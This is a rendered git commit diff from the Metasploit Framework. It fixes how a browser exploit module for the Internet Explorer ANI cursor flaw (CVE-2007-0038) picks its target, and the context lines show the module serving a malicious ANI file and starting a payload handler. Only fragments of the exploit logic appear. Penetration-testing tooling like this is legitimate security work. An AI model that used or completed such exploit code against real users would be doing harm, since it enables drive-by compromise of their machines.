Minor updates for targetting
git-svn-id: file:///home/svn/framework3/trunk@4606 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
aba1959d44
commit
b16fc9fd53
|
@ -127,6 +127,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
|
|
||||||
|
mytarget = self.target
|
||||||
ros = /.*/
|
ros = /.*/
|
||||||
|
|
||||||
case request.headers['User-Agent']
|
case request.headers['User-Agent']
|
||||||
|
@ -187,7 +188,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Set the requested target
|
# Set the requested target
|
||||||
if (targ and targets[targ])
|
if (targ and targets[targ])
|
||||||
target = targets[targ]
|
mytarget = targets[targ]
|
||||||
end
|
end
|
||||||
|
|
||||||
# Re-generate the payload, using the explicit target
|
# Re-generate the payload, using the explicit target
|
||||||
|
@ -196,7 +197,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||||
|
|
||||||
# Transmit the compressed response to the client
|
# Transmit the compressed response to the client
|
||||||
send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' })
|
send_response(cli, generate_ani(p, mytarget), { 'Content-Type' => 'application/octet-stream' })
|
||||||
|
|
||||||
handler(cli)
|
handler(cli)
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue